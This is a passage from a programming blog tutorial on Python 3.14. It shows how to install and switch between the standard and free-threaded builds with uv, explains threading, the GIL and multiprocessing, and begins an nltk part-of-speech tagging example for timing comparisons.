&lt;a href="https://www.jumpingrivers.com/blog/python-package/" rel="external"&gt;blog series on Poetry&lt;/a&gt;). But
&lt;code&gt;poetry&lt;/code&gt; doesn’t prevent developers using different versions of Python.
For that, we need a second tool like
&lt;a href="https://github.com/pyenv/pyenv" rel="external"&gt;&lt;code&gt;pyenv&lt;/code&gt;&lt;/a&gt; (which allows switching
between different Python versions) or for each developer to have the
same Python version installed on their machine.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; goes a step further than &lt;code&gt;poetry&lt;/code&gt; and allows us to pin Python
versions for a project. Let’s use &lt;code&gt;uv&lt;/code&gt; to install Python 3.14, so that
we can test out features in the new release.&lt;/p&gt;
&lt;p&gt;First follow the
&lt;a href="https://docs.astral.sh/uv/getting-started/installation/" rel="external"&gt;instructions for installing &lt;code&gt;uv&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Then at the command line, we will use &lt;code&gt;uv&lt;/code&gt; to create a new project where
we’ll use Python 3.14.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [bash]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ~/temp
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir blog-py3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd blog-py3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Which versions of Python 3.14 are available via uv?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python list | grep 3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# cpython-3.14.0rc2-linux-x86_64-gnu &amp;lt;download available&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# cpython-3.14.0rc2+freethreaded-linux-x86_64-gnu &amp;lt;download available&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You’ll see something similar regardless of the operating system that you
use. That lists two versions of Python 3.14 - one with an optional
system called “Free Threading” (see later). We’ll install both versions
of Python:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python install cpython-3.14.0rc2-linux-x86_64-gnu
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python install cpython-3.14.0rc2+freethreaded-linux-x86_64-gnu
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Users of &lt;code&gt;pyenv&lt;/code&gt; will be able to install Python 3.14 in a similar
manner.&lt;/p&gt;
&lt;p&gt;We can select between the two different Python versions at the command
line. First using the version that does not have free threading:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --python&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;3.14 python
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Python 3.14.0rc2 (main, Aug 18 2025, 19:19:22) [Clang 20.1.4 ] on linux&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; import sys
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; sys._is_gil_enabled&lt;span style="color:#ff7b72;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then using the version with free threading (note the &lt;code&gt;t&lt;/code&gt; suffix):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --python&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;3.14t python
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Python 3.14.0rc2 free-threading build (main, Aug 18 2025, 19:19:12) [Clang 20.1.4 ] on linux&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; import sys
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; sys._is_gil_enabled&lt;span style="color:#ff7b72;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# False&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="project-creation-and-management-with-uv"&gt;Project creation and management with &lt;code&gt;uv&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; is capable of much more than allowing us to switch between
different versions of Python. The following commands initialise a Python
project with &lt;code&gt;uv&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# From ~/temp/blog-py3.14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Indicate the default python version for the project&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python pin 3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Initialise a project in the current directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Check the Python version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run python --version
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Python 3.14.0rc2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This adds some files for project metadata (pyproject.toml, README.md)
and version control:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tree -a -L &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# .&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── .git&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── .gitignore&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── main.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── pyproject.toml&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── .python-version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── README.md&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── uv.lock&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# └── .venv&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 2 directories, 6 files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can add package dependencies using &lt;code&gt;uv add &amp;lt;packageName&amp;gt;&lt;/code&gt; and
carry out other standard project-management tasks. One thing I wanted to
highlight is that &lt;code&gt;uv&lt;/code&gt; allows us to start a Jupyter notebook, using the
project’s Python interpreter, without either adding &lt;code&gt;jupyter&lt;/code&gt; as a
dependency or explicitly defining a kernel for &lt;code&gt;jupyter&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --with jupyter jupyter lab
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the
&lt;a href="https://jupyterlab.readthedocs.io/en/stable/" rel="external"&gt;JupyterLab&lt;/a&gt; session that
starts, creating a new notebook with the default Python 3 kernel should
ensure you are using the currently active Python 3.14 environment.&lt;/p&gt;
&lt;h2 id="threading"&gt;Threading&lt;/h2&gt;
&lt;p&gt;Python 3.13 introduced an experimental feature, ‘Free-threading’, that
is now officially supported as of 3.14.&lt;/p&gt;
&lt;p&gt;First though, what is a &amp;rsquo;thread&amp;rsquo;? When a program runs on your computer,
there are lots of different tasks going on. Some of those tasks could
run independently of each other. You, as the programmer, may need to
explain to the computer which tasks can run independently. A thread is a
way of cordoning off one of those tasks: it tells the computer running
your software that &lt;em&gt;this task here&lt;/em&gt; can run
separately from &lt;em&gt;those tasks there&lt;/em&gt;, and it carries the logic for running
&lt;em&gt;this task&lt;/em&gt; too. (Basically.)&lt;/p&gt;
&lt;p&gt;Python has allowed developers to define threads for a while. If you have
a few tasks that are largely independent of each other, each of these
tasks can run in a separate thread. Threads can access the same memory
space, meaning that they can access and modify shared variables in a Python
session. In general, this also means that a computation in one thread
could update a value that is used by another thread, or that two
different threads could make conflicting updates to the same variable.
This freedom can lead to bugs. The CPython interpreter was originally
written with a locking mechanism (the Global Interpreter Lock, GIL) that
prevented different threads from running at the same time (even when
multiple processors were available) and limited the reach of these bugs.&lt;/p&gt;
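&lt;p&gt;To make the shared-memory risk concrete, here is a minimal sketch (not part of the example that follows; the names &lt;code&gt;run_counter&lt;/code&gt; and &lt;code&gt;increment_many&lt;/code&gt; are made up for illustration) in which several threads update one counter. A &lt;code&gt;threading.Lock&lt;/code&gt; keeps each read-modify-write step from interleaving with another thread, so the total should be predictable with or without the GIL:&lt;/p&gt;

```python
import threading

def run_counter(n_threads=4, n_increments=10_000):
    """Increment a shared counter from several threads, guarded by a lock."""
    counter = {"value": 0}  # shared, mutable state visible to every thread
    lock = threading.Lock()

    def increment_many():
        for _ in range(n_increments):
            # Without the lock, two threads could read the same old value
            # and one of the updates would be lost.
            with lock:
                counter["value"] += 1

    threads = [threading.Thread(target=increment_many) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return counter["value"]

total = run_counter()
print(total)
```

&lt;p&gt;Removing the &lt;code&gt;with lock:&lt;/code&gt; line is the kind of change that may appear to work in testing and then lose updates under load, which is why shared state deserves extra care in free-threaded code.&lt;/p&gt;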
&lt;p&gt;Traditionally, you would have used threads for “non-CPU-bound tasks” in
Python. These are the kinds of tasks that would be unaffected by having
more, or faster, processors available to the Python instance: network
traffic, file access, waiting for user input. For CPU-bound tasks, like
calculations and data-processing, you could use Python’s
‘multiprocessing’ library (although some libraries like ‘numpy’ have
their own low-level mechanisms for splitting work across cores). This
starts multiple Python instances, each doing a portion of the
processing, and allows a workload to be partitioned across multiple
processors.&lt;/p&gt;
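&lt;p&gt;As a rough illustration of the traditional use of threads, the sketch below fakes an I/O-bound task with &lt;code&gt;time.sleep()&lt;/code&gt;. The function names and file names are invented for this example. Because each task spends its time waiting rather than computing, the threads overlap even on a standard (GIL-enabled) build:&lt;/p&gt;

```python
import time
from concurrent.futures import ThreadPoolExecutor

def fake_download(name, delay=0.2):
    """Stand-in for an I/O-bound task: the thread just waits."""
    time.sleep(delay)
    return name

def fetch_all(names):
    # One worker per task, so all of the waiting happens at the same time
    with ThreadPoolExecutor(max_workers=len(names)) as pool:
        return list(pool.map(fake_download, names))

start = time.perf_counter()
results = fetch_all(["a.txt", "b.txt", "c.txt", "d.txt"])
elapsed = time.perf_counter() - start
print(results, round(elapsed, 2))
```

&lt;p&gt;On most machines the elapsed time should be close to a single delay rather than the sum of all four, but the exact figure will vary.&lt;/p&gt;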
&lt;p&gt;The other main differences between threading and multiprocessing in
Python are in memory and data management. With threading, you have one
Python instance, with each thread having access to the same memory
space. With multiprocessing, you have multiple Python instances that
work independently: the instances do not share memory, so to partition a
workload using multiprocessing, Python has to send copies of (subsets
of) your data to the new instances. This could mean that you need to
store two or more copies of a large dataset in memory when using
multiprocessing on it.&lt;/p&gt;
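&lt;p&gt;The difference in data handling can be sketched without starting any extra processes. The snippet below is an illustration under a stated assumption: it simulates the hand-off to a worker process with a &lt;code&gt;pickle&lt;/code&gt; round trip, which is how the standard library typically passes objects between processes. The variable and function names are invented for the example:&lt;/p&gt;

```python
import pickle
import threading

data = {"words": ["emma", "woodhouse"]}

def append_word(target, word):
    target["words"].append(word)

# A thread receives a reference to the very same object
t = threading.Thread(target=append_word, args=(data, "handsome"))
t.start()
t.join()
shared_len = len(data["words"])

# A worker process would typically receive a pickled copy (simulated here)
copy_for_worker = pickle.loads(pickle.dumps(data))
append_word(copy_for_worker, "clever")

print(shared_len, len(data["words"]), len(copy_for_worker["words"]))
```

&lt;p&gt;The change made in the thread is visible in &lt;code&gt;data&lt;/code&gt;, whereas the change made to the copy is not. The copy is also a second full set of the data in memory.&lt;/p&gt;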
&lt;p&gt;Simultaneous processing across threads that share memory-space is now
possible using the free-threaded build of Python. Many third-party
packages have been rewritten to accommodate this new build and you can
learn more about free-threading and the progress of the changes in the
&lt;a href="https://py-free-threading.github.io/" rel="external"&gt;“Python Free-Threading Guide”&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As a simple-ish example, let’s consider natural language processing.
There is a wonderful blog post about parallel processing with the
&lt;a href="https://www.nltk.org/" rel="external"&gt;&lt;code&gt;nltk&lt;/code&gt;&lt;/a&gt; package on the
&lt;a href="https://datascience.blog.wzb.eu/2017/06/19/speeding-up-nltk-with-parallel-processing/" rel="external"&gt;“WZB Data Science Blog”&lt;/a&gt;.
We will extend that example to use free-threading.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;nltk&lt;/code&gt; provides access to some of the
&lt;a href="https://www.gutenberg.org/" rel="external"&gt;Project Gutenberg&lt;/a&gt; books, and we can
access this data as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;nltk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;setup&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;download(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gutenberg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;download(&lt;span style="color:#a5d6ff"&gt;&amp;#34;punkt_tab&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;download(&lt;span style="color:#a5d6ff"&gt;&amp;#34;averaged_perceptron_tagger_eng&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    corpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        f_id: nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;gutenberg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;raw(f_id)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; f_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;gutenberg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fileids()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; corpus
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; setup()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The key-value pairs in &lt;code&gt;corpus&lt;/code&gt; are the abbreviated book-title and
contents for 18 books. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corpus[&lt;span style="color:#a5d6ff"&gt;&amp;#34;austen-emma.txt&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Emma by Jane Austen 1816]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# VOLUME I&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# CHAPTER I&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Emma Woodhouse, handsome, clever, and rich, with a comfortable home ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A standard part of a text-processing workflow is to tokenise and tag the
“parts-of-speech” (POS) in a document. We can do this using two &lt;code&gt;nltk&lt;/code&gt;
functions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main.py ... continued&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tokenise_and_pos_tag&lt;/span&gt;(doc):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;pos_tag(nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;word_tokenize(doc))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A function to sequentially tokenise and POS-tag the contents of a corpus
of books can be written:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main.py ... continued&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tokenise_seq&lt;/span&gt;(corpus):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    tokens &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        f_id: tokenise_and_pos_tag(doc)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; f_id, doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;items()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; tokens
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You need to install or build Python in a particular way to make use of
“Free-threaded” Python. In the above, we installed Python &amp;ldquo;3.14t&amp;rdquo; using
&lt;code&gt;uv&lt;/code&gt;, so we can compare the speed of free-threaded and sequential,
single-core, processing.&lt;/p&gt;
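&lt;p&gt;Inside a script, it can be handy to confirm which kind of build is running before drawing conclusions from any timings. The following is a small sketch rather than an official recipe; the helper name &lt;code&gt;describe_build&lt;/code&gt; is invented here. It combines the &lt;code&gt;Py_GIL_DISABLED&lt;/code&gt; build flag with the &lt;code&gt;sys._is_gil_enabled()&lt;/code&gt; call used earlier, and assumes the GIL is enabled on older Pythons where that call does not exist:&lt;/p&gt;

```python
import sys
import sysconfig

def describe_build():
    """Report whether this is a free-threaded build and whether the GIL is on."""
    # Py_GIL_DISABLED is 1 for free-threaded builds; 0 or None otherwise
    free_threaded = bool(sysconfig.get_config_var("Py_GIL_DISABLED"))
    # sys._is_gil_enabled() only exists on Python 3.13+, so fall back to True
    check = getattr(sys, "_is_gil_enabled", None)
    gil_enabled = check() if check is not None else True
    return {"free_threaded_build": free_threaded, "gil_enabled": gil_enabled}

print(describe_build())
```

&lt;p&gt;A free-threaded build can still report that the GIL is enabled, for example after importing an extension module that has not declared support for running without it.&lt;/p&gt;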
&lt;p&gt;We will use the
&lt;a href="https://docs.python.org/3/library/timeit.html" rel="external"&gt;&lt;code&gt;timeit&lt;/code&gt;&lt;/a&gt; module from the standard library to
analyse processing speed, from the command line.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Activate the free-threaded version of Python 3.14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python pin 3.14t
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install the dependency for our main.py script (timeit is in the standard library)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv add nltk
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Time the `tokenise_seq()` function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -- but do not time any setup code...&lt;/span&gt;
